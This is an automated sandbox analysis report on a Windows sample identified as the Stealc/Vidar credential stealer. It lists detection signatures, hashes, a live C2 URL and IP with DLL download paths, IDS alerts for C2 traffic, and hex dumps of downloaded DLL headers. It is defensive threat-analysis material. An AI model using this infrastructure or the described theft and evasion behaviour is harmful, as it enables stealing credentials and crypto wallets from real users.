Windows Analysis Report
h4ZgewNxoj.exe

Overview

General Information

Sample name: h4ZgewNxoj.exe
renamed because original name is a hash value
Original sample name: b7c3785aa2b9f10fc77bf33df04b2845d06d0ccfefd9df2af598f7ac0cf99f17.exe
Analysis ID: 1599299
MD5: 470aa1549c4266690a1a8d6d921017f9
SHA1: 57359f54841f8d0a4ae15fa53e9eb3dca725fa36
SHA256: b7c3785aa2b9f10fc77bf33df04b2845d06d0ccfefd9df2af598f7ac0cf99f17
Tags: exeuser-Bastian455_
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: h4ZgewNxoj.exe Avira: detected
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllb Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll$ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfox Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dlla Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpSxS Avira URL Cloud: Label: malware
Source: http://185.215.113.206/tem Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllY Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllO Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dlle Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllS Avira URL Cloud: Label: malware
Source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: h4ZgewNxoj.exe Virustotal: Detection: 41% Perma Link
Source: h4ZgewNxoj.exe ReversingLabs: Detection: 71%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: h4ZgewNxoj.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C4E6C80
Source: h4ZgewNxoj.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49932 version: TLS 1.0
Source: Binary string: mozglue.pdbP source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 